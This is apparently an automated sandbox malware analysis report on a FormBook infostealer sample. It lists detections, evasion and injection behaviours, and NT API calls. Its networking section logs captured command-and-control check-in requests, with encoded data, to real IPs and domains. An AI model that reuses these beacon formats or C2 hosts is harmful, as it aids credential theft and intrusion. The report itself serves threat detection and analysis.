Windows Analysis Report
INQUIRY 02825 AISISAE 9310.exe

Overview

General Information

Sample name: INQUIRY 02825 AISISAE 9310.exe
Analysis ID: 1650884
MD5: 5fb1732fae52b75b20121fd63c28782d
SHA1: 5b0d1319fc7c48060758e0f48db5cf13f1b01cb9
SHA256: 2f3db06327b9db382d291579335c42b44c9e3247ab08eb04617adc202688f8d2
Tags: exeuser-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Verdict scale: clean, suspicious, malicious.

AV Detection

Source: INQUIRY 02825 AISISAE 9310.exe Avira: detected
Source: INQUIRY 02825 AISISAE 9310.exe Virustotal: Detection: 53%
Source: INQUIRY 02825 AISISAE 9310.exe ReversingLabs: Detection: 58%
Source: Yara match File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: INQUIRY 02825 AISISAE 9310.exe, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdb source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gBSE2iEQW.exe, 00000007.00000000.1601710606.000000000030F000.00000002.00000001.01000000.00000005.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762176946.000000000030F000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: sdiagnhost.pdbGCTL source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BACD40 FindFirstFileW,FindNextFileW,FindClose, 8_2_02BACD40
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 4x nop then xor eax, eax 8_2_02B99FC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 4x nop then pop edi 8_2_02B9E8C4
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 4x nop then mov ebx, 00000004h 8_2_04B604CE

Networking

Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49725 -> 74.208.236.36:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49727 -> 74.208.236.36:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49724 -> 74.208.236.36:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49723 -> 104.21.32.1:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49728 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49730 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49726 -> 74.208.236.36:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49731 -> 15.197.148.33:80
Source: Joe Sandbox View IP Address: 15.197.148.33
Source: Joe Sandbox View IP Address: 104.21.32.1
Source: Joe Sandbox View IP Address: 74.208.236.36
Source: Joe Sandbox View ASN Name: TANDEMUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /tsak/?Oh44=V2GdJFVxnvwp5&JNiPg=YQHVXA7vk5Ejd4ZI1zcMQi9WtUWM1HJ5GkASxIA+KfBd6gRSELiW++EKJDSr3fSHhVfVzVIMxi/ALCU2icaE1H+f7Fhozj6HyTo+MG9+YFBrLfLyAWvdIJY= HTTP/1.1 Host: www.dramavietsub.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Source: global traffic HTTP traffic detected: GET /xumw/?JNiPg=6nidXIeTjwp+/8jOwEASM9o1nZX2cytP12WwgCMMdzORX2Ri86uOscPEUO1eXyN18jrqCkChD4uO80oJ0ZYE6dJtCQhaO7L9sBhghid2pa1G5t+t4sRy24o=&Oh44=V2GdJFVxnvwp5 HTTP/1.1 Host: www.truenorthcards.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Source: global traffic HTTP traffic detected: GET /4132/?JNiPg=SIKt0PplAcX2tlTtKDgwrepqNkvE+VzalCBUBKLKHPFwsgz0Xvd9+/M3aHJpe/gMB2zKKmKQxYTQsJSvf7VUuXfsdUkPz/7Uk916yFL2WDJE7L5uZ6NnSA0=&Oh44=V2GdJFVxnvwp5 HTTP/1.1 Host: www.atepl.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.dramavietsub.net
Source: global traffic DNS traffic detected: DNS query: www.truenorthcards.org
Source: global traffic DNS traffic detected: DNS query: www.atepl.info
Source: unknown HTTP traffic detected: POST /xumw/ HTTP/1.1 Host: www.truenorthcards.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.truenorthcards.org Referer: http://www.truenorthcards.org/xumw/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36 Data Ascii: JNiPg=3lK9U8mGtAZZz7ig5S4xNP0biKmsXBtG/WL72DdPXlGtbnhm7YjukcPuAOxZOUdc6A/XLlvKZ6nM9HkBg44MoPQbdjhlTpXDrhcwjSRdyo9+6oKywK4w4fdm3yePOdtZK4QGX+wzdOLX0CMtzKPsNcUGYE6re6qlvLM4pB1/xwLIYlBvFn8z3Ba5x/eNmTDhCw==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close X-WS-RateLimit-Limit: 1000 X-WS-RateLimit-Remaining: 999 Date: Fri, 28 Mar 2025 05:40:08 GMT Server: Apache Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close X-WS-RateLimit-Limit: 1000 X-WS-RateLimit-Remaining: 999 Date: Fri, 28 Mar 2025 05:40:11 GMT Server: Apache Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close X-WS-RateLimit-Limit: 1000 X-WS-RateLimit-Remaining: 999 Date: Fri, 28 Mar 2025 05:40:13 GMT Server: Apache Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close X-WS-RateLimit-Limit: 1000 X-WS-RateLimit-Remaining: 999 Date: Fri, 28 Mar 2025 05:40:16 GMT Server: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: gBSE2iEQW.exe, 00000009.00000002.2484249497.00000000056D1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.atepl.info
Source: gBSE2iEQW.exe, 00000009.00000002.2484249497.00000000056D1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.atepl.info/4132/
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: sdiagnhost.exe, 00000008.00000002.2480736638.00000000030D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdiagnhost.exe, 00000008.00000002.2480736638.00000000030D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdiagnhost.exe, 00000008.00000002.2480736638.00000000030FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdiagnhost.exe, 00000008.00000003.1871304633.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: sdiagnhost.exe, 00000008.00000002.2484625745.0000000007EDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud

Source: Yara match File source: 0.2.INQUIRY 02825 AISISAE 9310.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2480301327.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1694455454.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1699741449.00000000068F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2481831657.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2482100225.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2482791837.00000000036D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1695148193.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0007D003 NtClose, 0_2_0007D003
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2B60 NtClose,LdrInitializeThunk, 0_2_019D2B60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 0_2_019D2DF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 0_2_019D2C70
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D35C0 NtCreateMutant,LdrInitializeThunk, 0_2_019D35C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D4340 NtSetContextThread, 0_2_019D4340
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D4650 NtSuspendThread, 0_2_019D4650
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2B80 NtQueryInformationFile, 0_2_019D2B80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2BA0 NtEnumerateValueKey, 0_2_019D2BA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2BF0 NtAllocateVirtualMemory, 0_2_019D2BF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2BE0 NtQueryValueKey, 0_2_019D2BE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2AB0 NtWaitForSingleObject, 0_2_019D2AB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2AD0 NtReadFile, 0_2_019D2AD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2AF0 NtWriteFile, 0_2_019D2AF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2DB0 NtEnumerateKey, 0_2_019D2DB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2DD0 NtDelayExecution, 0_2_019D2DD0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2D10 NtMapViewOfSection, 0_2_019D2D10
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2D00 NtSetInformationFile, 0_2_019D2D00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2D30 NtUnmapViewOfSection, 0_2_019D2D30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2CA0 NtQueryInformationToken, 0_2_019D2CA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2CC0 NtQueryVirtualMemory, 0_2_019D2CC0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2CF0 NtOpenProcess, 0_2_019D2CF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2C00 NtQueryInformationProcess, 0_2_019D2C00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2C60 NtCreateKey, 0_2_019D2C60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2F90 NtProtectVirtualMemory, 0_2_019D2F90
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2FB0 NtResumeThread, 0_2_019D2FB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2FA0 NtQuerySection, 0_2_019D2FA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2FE0 NtCreateFile, 0_2_019D2FE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2F30 NtCreateSection, 0_2_019D2F30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2F60 NtCreateProcessEx, 0_2_019D2F60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2E80 NtReadVirtualMemory, 0_2_019D2E80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2EA0 NtAdjustPrivilegesToken, 0_2_019D2EA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2EE0 NtQueueApcThread, 0_2_019D2EE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D2E30 NtWriteVirtualMemory, 0_2_019D2E30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D3090 NtSetValueKey, 0_2_019D3090
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D3010 NtOpenDirectoryObject, 0_2_019D3010
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D39B0 NtGetContextThread, 0_2_019D39B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D3D10 NtOpenProcessToken, 0_2_019D3D10
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D3D70 NtOpenThread, 0_2_019D3D70
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D44650 NtSuspendThread,LdrInitializeThunk, 8_2_04D44650
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D44340 NtSetContextThread,LdrInitializeThunk, 8_2_04D44340
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_04D42CA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_04D42C70
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42C60 NtCreateKey,LdrInitializeThunk, 8_2_04D42C60
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42DD0 NtDelayExecution,LdrInitializeThunk, 8_2_04D42DD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_04D42DF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_04D42D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_04D42D30
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_04D42EE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_04D42E80
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42FE0 NtCreateFile,LdrInitializeThunk, 8_2_04D42FE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42FB0 NtResumeThread,LdrInitializeThunk, 8_2_04D42FB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42F30 NtCreateSection,LdrInitializeThunk, 8_2_04D42F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42AD0 NtReadFile,LdrInitializeThunk, 8_2_04D42AD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42AF0 NtWriteFile,LdrInitializeThunk, 8_2_04D42AF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_04D42BF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_04D42BE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_04D42BA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42B60 NtClose,LdrInitializeThunk, 8_2_04D42B60
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D435C0 NtCreateMutant,LdrInitializeThunk, 8_2_04D435C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D439B0 NtGetContextThread,LdrInitializeThunk, 8_2_04D439B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42CC0 NtQueryVirtualMemory, 8_2_04D42CC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42CF0 NtOpenProcess, 8_2_04D42CF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42C00 NtQueryInformationProcess, 8_2_04D42C00
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42DB0 NtEnumerateKey, 8_2_04D42DB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42D00 NtSetInformationFile, 8_2_04D42D00
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42EA0 NtAdjustPrivilegesToken, 8_2_04D42EA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42E30 NtWriteVirtualMemory, 8_2_04D42E30
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42F90 NtProtectVirtualMemory, 8_2_04D42F90
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42FA0 NtQuerySection, 8_2_04D42FA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42F60 NtCreateProcessEx, 8_2_04D42F60
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42AB0 NtWaitForSingleObject, 8_2_04D42AB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D42B80 NtQueryInformationFile, 8_2_04D42B80
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D43090 NtSetValueKey, 8_2_04D43090
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D43010 NtOpenDirectoryObject, 8_2_04D43010
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D43D70 NtOpenThread, 8_2_04D43D70
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D43D10 NtOpenProcessToken, 8_2_04D43D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BB9A40 NtReadFile, 8_2_02BB9A40
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BB9BD0 NtClose, 8_2_02BB9BD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BB9B30 NtDeleteFile, 8_2_02BB9B30
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BB98D0 NtCreateFile, 8_2_02BB98D0
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BB9D20 NtAllocateVirtualMemory, 8_2_02BB9D20
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04D8F290 appears 105 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04D57E54 appears 111 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04CFB970 appears 280 times
